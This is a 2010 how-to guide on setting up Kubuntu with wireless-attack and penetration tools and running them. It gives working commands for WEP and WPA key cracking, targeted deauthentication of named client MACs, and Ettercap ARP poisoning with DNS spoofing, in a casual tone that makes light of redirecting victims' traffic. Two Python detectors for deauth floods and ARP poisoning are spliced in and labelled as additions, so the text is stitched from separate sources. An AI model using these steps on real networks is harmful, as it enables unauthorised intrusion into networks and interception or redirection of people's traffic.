
2010

Basic Penetration Testing:


Kubuntu Style
Linux for the casual hacker
Installing:
Aircrack-ng
Ettercap
Kismet
MacChanger
Metasploit Framework
Nmap
Social Engineering Toolkit (SET)
Wireshark

Basic Use:
Kismet network sniffing
Aircrack-ng WEP and WPA cracking
Ettercap ARP poisoning / DNS Spoofing

Chris Griffith
Chris@ChristopherGriffith.net
Version 1.1
February 25, 2010

PENETRATION TESTING
Step 1: Install Kubuntu .................................................................................................................................. 4
Step 2: Update apt-get .................................................................................................................................. 4
Update repository list ............................................................................................................................... 4
Upgrade current programs ....................................................................................................................... 4
Step 3: Install Basic Packages ........................................................................................................................ 4
Install Aircrack-ng.......................................................................................................................................... 5
Install Dependencies ................................................................................................................................. 5
Download Aircrack-ng ............................................................................................................................... 5
Download and Extract Dictionary ............................................................................................................. 5
Extract Aircrack-ng source files ................................................................................................................. 5
Install Aircrack-ng...................................................................................................................................... 5
Update Airodump-ng ................................................................................................................................ 5
Remove Install File .................................................................................................................................... 5
Install MacChanger ....................................................................................................................................... 6
Install Dependencies ................................................................................................................................. 6
Install MacChanger ................................................................................................................................... 6
Install Wireshark ........................................................................................................................................... 6
Install Kismet ................................................................................................................................................. 7
Install Dependencies ................................................................................................................................. 7
Download Kismet ...................................................................................................................................... 7
Extract Kismet source files ........................................................................................................................ 7
Run Configuration ..................................................................................................................................... 7
Install Kismet ............................................................................................................................................. 7
Remove Install File .................................................................................................................................... 8
Configure Kismet ....................................................................................................................................... 8
Install Metasploit .......................................................................................................................................... 9
Download Metasploit ............................................................................................................................... 9
Enable Execution ....................................................................................................................................... 9
Install Metasploit ...................................................................................................................................... 9
Remove Install File .................................................................................................................................... 9
Install SET .................................................................................................................................... 10
Install Dependencies ............................................................................................................................... 10
Download SET ......................................................................................................................................... 10
Run SET ................................................................................................................................................... 10
Install Nmap ................................................................................................................................................ 11
Download Nmap ..................................................................................................................................... 11
Extract Nmap Files .................................................................................................................................. 11
Configure Nmap ...................................................................................................................................... 11
Install Nmap ............................................................................................................................................ 11
Install Nmap GUI, Zenmap ...................................................................................................................... 11
Remove Install Files ................................................................................................................................ 12
Install Ettercap ............................................................................................................................................ 12
Install Dependencies ............................................................................................................................... 12
Install Ettercap ........................................................................................................................................ 12
Install Ettercap's gtk GUI ......................................................................................................................... 12
Running Kismet ........................................................................................................................................... 13
Running Aircrack-ng .................................................................................................................................... 18
Scanning Networks ................................................................................................................................. 18
WEP Attack.............................................................................................................................................. 19
WPA Attack ............................................................................................................................................. 21
DNS spoofing with Ettercap ........................................................................................................................ 25
Editing Where to Redirect Targets.......................................................................................................... 25
Sniffing Network Traffic .......................................................................................................................... 25
Poisoning Targets .................................................................................................................................... 27
Contact Info................................................................................................................................................. 29
Legal Notice and Disclaimer ........................................................................................................................ 29
Liability .................................................................................................................................................... 29
Legality .................................................................................................................................................... 29

STEP 1: INSTALL KUBUNTU


(Most of these commands are also friendly with other flavors of Ubuntu)

Go to http://www.kubuntu.org/
Download (free) or Order a CD/DVD of Kubuntu
Install Kubuntu. If you need help there, there are plenty of community support sites online (similar to
linux.com) that will help you get started.

STEP 2: UPDATE APT-GET


Note: requires internet connection
apt-get is the program that you will be using to download multiple components. The first step is to update its
repository list and also see if there are any program updates needed. To run these commands start the terminal.
It can be found under Applications >> System >> Terminal.

UPDATE REPOSITORY LIST


sudo apt-get -y update

UPGRADE CURRENT PROGRAMS


sudo apt-get -y upgrade

STEP 3: INSTALL BASIC PACKAGES


These will make your life easier while installing packages and using Kubuntu.
sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw
libssl-dev

Note: While installing, it is assumed that you are starting in your home directory. You can make sure
you are in that directory before doing any installations by typing in (cd is a shell builtin, so it is run
without sudo):
cd ~

NOTICE: Each block of code represents a single command, even if on multiple rows!

INSTALL AIRCRACK-NG
Website: http://aircrack-ng.org/
Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once
enough data packets have been captured. It implements the standard FMS attack along with some optimizations
like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other
WEP cracking tools."

INSTALL DEPENDENCIES
sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar

DOWNLOAD AIRCRACK-NG
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

DOWNLOAD AND EXTRACT DICTIONARY


wget http://www.christophergriffith.net/downloads/Glist.rar

unrar e Glist.rar

EXTRACT AIRCRACK-NG SOURCE FILES


tar -zxvf aircrack-ng-1.0.tar.gz

INSTALL AIRCRACK-NG
cd aircrack-ng-1.0

make

sudo make install

UPDATE AIRODUMP-NG
sudo airodump-ng-oui-update

REMOVE INSTALL FILE


cd ~

sudo rm aircrack-ng-1.0.tar.gz

sudo rm -r aircrack-ng-1.0

INSTALL MACCHANGER
Website: http://www.alobbs.com/macchanger
Description: A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces

INSTALL DEPENDENCIES
sudo apt-get -y install macchanger iproute-dev zenity

INSTALL MACCHANGER
sudo apt-get -y install macchanger-gtk

INSTALL WIRESHARK
Website: http://www.wireshark.org
Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de
jure) standard across many industries and educational institutions."
sudo apt-get -y install wireshark

INSTALL KISMET
Website: http://www.kismetwireless.net/
Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate
hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow
sniffing other media such as DECT.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting
(and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data
traffic. "

INSTALL DEPENDENCIES
sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5

sudo apt-get -y install libpcap-dev libnl-dev libnl1

DOWNLOAD KISMET
wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz

EXTRACT KISMET SOURCE FILES


tar -zxvf kismet-2010-01-R1.tar.gz

RUN CONFIGURATION
cd kismet-2010-01-R1

./configure

Note: LOOK AT THE OUTPUT! It may say "LibNL/nl80211 support was not found." Check to make sure
it's installed; the terminal may say this simply because it is not needed/used. If there are errors here,
try to fix them, and then you will need to run this command again before "make dep".
INSTALL KISMET
make dep

sudo make install

Note: It will give the option to use "sudo make suidinstall", which means you do not have to run kismet
as root; however, in Kubuntu that is very temperamental and requires the kismet_server to be started
as root separately anyway. I would recommend just using "sudo make install" and running it as root.
REMOVE INSTALL FILE
cd ~

sudo rm kismet-2010-01-R1.tar.gz

sudo rm -r kismet-2010-01-R1

CONFIGURE KISMET
You will also have to edit the configuration file before using kismet. This will be covered in the section
below about kismet usage. You can edit the file by typing
sudo kate /usr/local/etc/kismet.conf

INSTALL METASPLOIT
Metasploit is arguably the best open database of exploits.
Website: http://www.metasploit.com/
Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and
IDS signature developers. This project was created to provide information on exploit techniques and to create a
functional knowledgebase for exploit developers and security professionals."

DOWNLOAD METASPLOIT
wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run

ENABLE EXECUTION
chmod +x framework-3.3.3-linux-i686.run

INSTALL METASPLOIT
sudo ./framework-3.3.3-linux-i686.run

REMOVE INSTALL FILE


In case you hate cluttering up your home folder like I do, remove the install files with:
sudo rm framework-3.3.3-linux-i686.run

INSTALL SET
The Social Engineering Toolkit is a very nice and easy way to run a multitude of different exploits, by exploiting the
user with payloads from Metasploit.
Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit
Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates
many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate
and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a
practice that not many people perform."

INSTALL DEPENDENCIES
NOTE: SET requires Metasploit, please install it before trying to run SET
sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full

DOWNLOAD SET
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

RUN SET
SET does NOT require installation. To run SET, go to its directory and type in "sudo ./set". In this scenario, the
commands would look like:
cd SET

sudo ./set

INSTALL NMAP
Website: http://nmap.org/
Description: Nmap (Network Mapper) is a free and open source utility for network exploration or security
auditing. Many systems and network administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel
ways to determine what hosts are available on the network, what services (application name and version) those
hosts are offering, what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks,
but works fine against single hosts.

Note: If you simply want to install Nmap and Zenmap and not worry if they are the latest version just
type:
sudo apt-get -y install nmap

sudo apt-get -y install zenmap

If you DO want the newest version, follow these steps:


DOWNLOAD NMAP
wget http://nmap.org/dist/nmap-5.21.tar.bz2

EXTRACT NMAP FILES


bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -

CONFIGURE NMAP
cd nmap-5.21

./configure

INSTALL NMAP
make

sudo make install

INSTALL NMAP GUI, ZENMAP


sudo apt-get -y install zenmap

REMOVE INSTALL FILES


cd ~

sudo rm nmap-5.21.tar.bz2

sudo rm -r nmap-5.21

INSTALL ETTERCAP
Website: http://ettercap.sourceforge.net/
Description: Ettercap is a suite for man-in-the-middle attacks on a LAN. It features sniffing of live connections,
content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many
protocols (even ciphered ones) and includes many features for network and host analysis.

Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up to date
version in the repositories. This just outlines which dependencies to get along with the GUI.
INSTALL DEPENDENCIES
sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin
zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev
libncurses5 ettercap-common libnet1

INSTALL ETTERCAP
sudo apt-get -y install ettercap

INSTALL ETTERCAP'S GTK GUI


sudo apt-get -f -y install ettercap-gtk

RUNNING KISMET
Kismet is a user-friendly program overall but needs some configuration before starting. Before starting Kismet,
you need to edit the configuration file.
sudo kate /usr/local/etc/kismet.conf

Note: If you are running Ubuntu, type gedit instead of kate


Once having kismet.conf open, find the line

# logprefix=/some/path/to/logs
This is where you will have to change where all of Kismet's log files are stored. I personally use

/home/<myusername>/wifi/logs
(Change to your user name for your home folder.) To add these directories to your home folder, before editing
the line, open a terminal and type:
sudo mkdir ~/wifi

sudo mkdir ~/wifi/logs

The next thing you need to specify is which adapter of yours to use for wireless sniffing. Find the lines

# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
After all these lines, add a line with your adapter. Most people would add

ncsource=wlan0
NOTE: If you are unsure what type of adapter you have, go to a terminal and type
ifconfig

This will display the network devices it finds. Then choose a wireless card, generally noted by wlan or wifi.

The last thing you will want to change is where it says:

# Do we have a GPS?
gps=true
If you don't have a gps unit hooked up to your computer change it to

gps=false
You can now run kismet by opening a terminal and typing
sudo kismet

On opening, if configured correctly, it should ask you if you want to start the Kismet server. Select yes.

It will then give you options about the kismet server. You don't have to change anything here, click start

The terminal now will show what is running in the server, this isn't overly exciting, it will simply tell you if
anything is going wrong. Close that window to get back to kismet by going to the bottom right hand corner.

You now should see the main page of Kismet. From here you can see all the wireless networks it has picked up,
the general packet rate and how much data is being transferred. You can also select an individual network to
find out more about it. However, before being able to select a network you have to sort them. I generally like to
sort by which network has the most packet traffic. You can do this by going to the top menu, Sort >> Packets
(descending) or by hitting Alt+S then Shift + P

You can now select a network which will display general information about it. Click it or hit enter to see more
details about it. To get back to the regular view, go to Network >> Close Window or Alt + N then hit W.

Another handy view is to go to Windows >> Channel View or Alt + W then C. It will show which channels have the
most traffic, packet rate, and general signal strength.

That is the basic usage of Kismet, if you are interested in knowing more you can find a lot more usage and details
all over forums and community sites.

RUNNING AIRCRACK-NG
Aircrack is the premier network cracking program. There are a few steps that will make it much easier to crack a
network. I will outline the basics of scanning for a network to attack and how to attack it if it is either WEP or
WPA.

SCANNING NETWORKS
First you want to put your wireless card in monitor mode. Do this by typing
sudo airmon-ng start <wireless interface>

For me this looks like:


sudo airmon-ng start wlan1

We then start scanning the different networks with the interface in monitoring mode.
sudo airodump-ng mon0

The first type of attack we are going to run is against a network running WEP encryption.

WEP ATTACK
Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and
that you only want to log IVs.
sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0

For my network, my command looks like:


sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0

Once you have collected a LOT of IVs (which you can see under the "#Data" column, a few thousand at least),
start up aircrack on the file you have created. Notice that it now will be a .ivs file. It also is appended with
numbers, so the first time you run that file, it would be WEP-01.ivs.
The command would look like:
sudo aircrack-ng -a 1 <cap file>

My command is:
sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs

Select the network you want to attack.

If you find the key, you can now use it to connect to the network. If not, it will probably ask you to capture more
IVs and try again.

WPA ATTACK
WPA attacks require a device that supports packet injection; this will allow you to de-authenticate clients so
they have to reconnect, which will allow you to capture their handshake. You will also need a dictionary of
words to try in a dictionary attack. You can download them online from multiple places; I compiled a small collection
of very large dictionaries that you can download using the Glist.rar wget and unrar commands in the Aircrack-ng section above.

When you see a network that you are interested in, you want to refine your network search and start logging
the output.
sudo airodump-ng --channel <channel number> -w <cap file> mon0

The network I am going after is called Rogue Network which is on channel 1, so my command looks like
sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0

While scanning the networks, you will notice, underneath each network, the different devices that are connected to it.
This attack is much more powerful if you have someone in particular to de-authenticate.
Note: Make sure you are still running airodump-ng in another terminal. You will need to capture the WPA
handshake as soon as the clients try to re-authenticate.
You can try to de-authenticate everyone and see if everyone reconnects:
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0

Or you can specify a particular client to attack, by adding one after -c


sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <clients bssid> mon0

My example looks like:


sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0

Now switch over to the airodump-ng tab, and in the upper right-hand corner, see if it says WPA Handshake.

If you were able to capture one, you can move over to dictionary attacking it. If you were unable to capture a
handshake, make sure you are attacking a WPA network with aireplay-ng and that there are clients connected to
it.
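The de-authentication step above is also what a defender watches for: a burst of deauth frames from one BSSID to one client (or to the broadcast address) is the wire-level signature of aireplay-ng --deauth. The following Python sliding-window detector is an added example and is not part of the original guide; it runs over constructed frame records (timestamp, subtype, BSSID, destination), and the threshold and window values are assumed, not taken from any tool. Kismet raises a comparable DEAUTHFLOOD alert.

```python
"""Flag de-authentication floods like the aireplay-ng step above produces.

Input is a list of constructed 802.11 management-frame records
(timestamp, subtype, bssid, destination). In practice the records would come
from a monitor-mode capture. Threshold and window are assumed values.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

DEAUTH, DISASSOC, DATA = "deauth", "disassoc", "data"
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Alert:
    bssid: str
    target: str        # client MAC, or the broadcast address for "deauth everyone"
    count: int
    first_ts: float
    last_ts: float


class DeauthFloodDetector:
    """Sliding-window count of deauth/disassoc frames per (bssid, target)."""

    def __init__(self, threshold=4, window=10.0):
        self.threshold = threshold          # more than this many frames ...
        self.window = window                # ... within this many seconds fires
        self._seen = defaultdict(deque)     # (bssid, target) -> recent timestamps
        self._alerted = set()               # one alert per (bssid, target)

    def feed(self, ts, subtype, bssid, dst):
        if subtype not in (DEAUTH, DISASSOC):
            return None                     # data/other management frames are ignored
        key = (bssid.lower(), dst.lower())
        q = self._seen[key]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) > self.threshold and key not in self._alerted:
            self._alerted.add(key)
            return Alert(key[0], key[1], len(q), q[0], ts)
        return None


def scan(frames, threshold=4, window=10.0):
    """Run every record through the detector and return the alerts raised."""
    det = DeauthFloodDetector(threshold, window)
    return [a for a in (det.feed(*f) for f in frames) if a is not None]


# Constructed sample records (MACs of the guide's AP and client reused as labels).
SAMPLE_FRAMES = [
    (0.0,   DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),  # one deauth: client leaving normally
    (1.0,   DATA,   "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (30.0,  DEAUTH, "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),  # slow trickle, stays under threshold
    (60.0,  DEAUTH, "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
    (90.0,  DEAUTH, "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
    # Targeted burst aimed at one client (real floods are far larger than five frames)
    (100.0, DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (100.1, DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (100.2, DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (100.3, DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    (100.4, DEAUTH, "00:14:D1:C3:C9:88", "00:16:EA:72:58:BA"),
    # Broadcast burst: the "de-authenticate everyone" variant
    (200.0, DEAUTH, "00:11:22:33:44:55", BROADCAST),
    (200.1, DEAUTH, "00:11:22:33:44:55", BROADCAST),
    (200.2, DEAUTH, "00:11:22:33:44:55", BROADCAST),
    (200.3, DEAUTH, "00:11:22:33:44:55", BROADCAST),
    (200.4, DEAUTH, "00:11:22:33:44:55", BROADCAST),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_FRAMES):
        print(f"{a.bssid} -> {a.target}: {a.count} deauths in "
              f"{a.last_ts - a.first_ts:.1f}s starting at t={a.first_ts}")
```

Legitimate roaming produces isolated deauths, so the window keeps those below the threshold; tune both values to the site's normal client churn before alerting on them.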
The next step requires a dictionary file to try and crack it using a list of common words and passwords.
sudo aircrack-ng -a 2 -w <dictionary file> <caps file>

My command will look like this

sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap

It will start testing against your word list, and hopefully find the key.

DNS SPOOFING WITH ETTERCAP


EDITING WHERE TO REDIRECT TARGETS

The first step is to decide where to redirect the target; you can edit the file etter.dns.
sudo kate /usr/share/ettercap/etter.dns

At the end of the file, you can type the domain you want to redirect, and the IP of where you want to redirect
to. To simply redirect someone, type the domain, then A, then the IP to redirect to.
For example, to redirect traffic from Google to Bing, type

google.com A 64.4.8.147
*.google.com A 64.4.8.147
The second one includes a wildcard, so any subdomain of google will also be redirected, including when they type www
before it. You can find the IP address of the site you want to redirect to by going to the terminal and typing:
host <website url>

This will display a list of IPs tied to that domain; the main one will be the first line displayed.
Save and close the file, then start up Ettercap as root.
sudo ettercap -G

Note: if you are having problems with ettercap in GTK mode try running it directly in the terminal with curses.
Do this by typing "sudo ettercap -C".
Now that you have your shiny front end, you want to first start sniffing the traffic of the network you are
connected to. Remember, Ettercap only works when you are connected to a network, while Aircrack and
Kismet work better without being connected to a network.

SNIFFING NETWORK TRAFFIC


The next step is to start sniffing the traffic and all the hosts on your network. Start the "Unified
sniffing..." under the "Sniff" menu item (Sniff >> Unified sniffing...), or hit Shift + U.
This will bring up a drop down box of interfaces to sniff on. Select the one which you are connected to the
network on. After selecting this and hitting ok, you will notice a larger selection of menu items.
Running in curses: you will need to type the name of the adapter in instead.
You now want to scan all the hosts on your network, to select your targets. Do this by going to Hosts >> Scan for
hosts or Ctrl + S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.

Now you need to select who you want to poison. You are currently being the "man in the middle" and are
choosing which connections to be between. To successfully spoof the DNS of the target computers, you must
know the device that they are connected to. You can usually tell by it having an IP far off from the others on the
list. Most home routers will be in the 192.168.0.1 - 192.168.1.10 range. The one you see in the examples is
192.168.1.1. Select it and click on "Add to Target 1", then select all the other devices, or a specific one you want to
poison, and add it to Target 2.

Running in curses: you will have to manually add the targets. You can do this by hitting Ctrl + T or going to
Targets >> Select TARGET(s). Then enter the IPs of the targets between the slashes, so either /192.168.1.1/
would work, or /192.168.1.1-255/ if you want to do a range.
Note: You can check to make sure you specified the right targets by hitting T or going to Targets >> Current
Targets.

POISONING TARGETS
Now you need to poison the targets' ARP caches. Go to Mitm >> Arp poisoning... A popup will appear, and you don't
need to set any optional parameters; just accept and go on. Now hit Ctrl + W to start sniffing, or go to Start >>
Start sniffing...

Finally, enable the DNS spoofing plugin by hitting Ctrl + P (Plugins >> Manage the plugins) and select
"dns_spoof".

Now in the console underneath you should see the command "Activating dns_spoof plugin..."
Then lean back and laugh as you see your plugin working, it will display content when people try to go to a
spoofed site: "dns_spoof: [<original url>] spoofed to [<new ip>]"
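On the wire, the ARP poisoning step above looks like one MAC suddenly answering for the gateway's IP and for the victims' IPs at the same time, which is exactly what an arpwatch-style monitor catches. The following Python checker is an added example, not part of the original guide or of Ettercap: it consumes constructed ARP-reply records (timestamp, sender IP, sender MAC), with the gateway at the guide's 192.168.1.1 and the subnet, MACs and severities all assumed.

```python
"""Detect ARP-cache poisoning of the kind the Ettercap steps above produce.

Reads constructed ARP-reply records (timestamp, sender IP, sender MAC) and
raises an alert when an IP, especially the gateway, is suddenly claimed by a
different MAC, or when one MAC claims more than one IP address. Both are what a
man-in-the-middle sitting between the gateway and its victims looks like.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Alert:
    ts: float
    severity: str   # "HIGH" or "MEDIUM" (assumed scale)
    kind: str       # "gateway-mac-changed", "mac-changed" or "multi-ip-claim"
    ip: str
    mac: str
    detail: str


class ArpWatch:
    def __init__(self, gateway_ip, subnet):
        self.gateway = ipaddress.ip_address(gateway_ip)
        self.subnet = ipaddress.ip_network(subnet)
        self.bindings = {}               # ip -> MAC currently believed to own it
        self.claims = defaultdict(set)   # MAC -> set of IPs it has answered for

    def feed(self, ts, sender_ip, sender_mac):
        """Learn one ARP reply; return the (possibly empty) list of alerts it raises."""
        alerts = []
        ip = ipaddress.ip_address(sender_ip)
        mac = sender_mac.lower()
        if ip not in self.subnet:
            return alerts                # off-subnet senders are out of scope here
        prev = self.bindings.get(ip)
        if prev is not None and prev != mac:
            # A binding change can also be DHCP reuse or a swapped NIC, so the
            # gateway moving is rated higher than an ordinary host moving.
            if ip == self.gateway:
                alerts.append(Alert(ts, "HIGH", "gateway-mac-changed", str(ip), mac,
                                    f"gateway {ip} moved from {prev} to {mac}"))
            else:
                alerts.append(Alert(ts, "MEDIUM", "mac-changed", str(ip), mac,
                                    f"{ip} moved from {prev} to {mac}"))
        self.bindings[ip] = mac
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            # Hosts with aliased addresses do this legitimately; whitelist those.
            ips = ", ".join(str(i) for i in sorted(self.claims[mac]))
            alerts.append(Alert(ts, "HIGH", "multi-ip-claim", str(ip), mac,
                                f"{mac} now answers for {ips}"))
        return alerts


def analyze(records, gateway_ip="192.168.1.1", subnet="192.168.1.0/24"):
    """Feed every record through one ArpWatch and collect all alerts."""
    watch = ArpWatch(gateway_ip, subnet)
    out = []
    for ts, sip, smac in records:
        out.extend(watch.feed(ts, sip, smac))
    return out


# Constructed sample replies; the client MAC is the one used in the guide, the rest are made up.
SAMPLE_ARP_REPLIES = [
    (0.0,  "192.168.1.1",  "00:1a:2b:3c:4d:5e"),   # gateway, legitimate
    (1.0,  "192.168.1.20", "00:16:ea:72:58:ba"),   # victim laptop
    (2.0,  "192.168.1.30", "00:22:33:44:55:66"),   # another host
    (5.0,  "192.168.1.1",  "00:1a:2b:3c:4d:5e"),   # gateway refresh, no change
    (60.0, "192.168.1.1",  "00:0c:29:aa:bb:cc"),   # poisoner claims to be the gateway
    (60.1, "192.168.1.20", "00:0c:29:aa:bb:cc"),   # ...and claims the victim toward the gateway
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_ARP_REPLIES):
        print(f"t={a.ts:6.1f} {a.severity:6} {a.kind:20} {a.detail}")
```

A static ARP entry for the gateway on the clients, or DHCP snooping with dynamic ARP inspection on the switch, stops the poisoning itself; the monitor above is for spotting it on networks where that is not in place.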

CONTACT INFO
I hope you have found this information useful and accurate.
If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.
Chris@ChristopherGriffith.net

LEGAL NOTICE AND DISCLAIMER

LIABILITY
1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no
responsibility for your actions with this knowledge. I hope you find it useful to test on your own network
and learn how to tighten your own security.

LEGALITY
2. It is ILLEGAL to use many of these programs on networks you don't own. Make sure you are abiding by all
laws while using these programs.
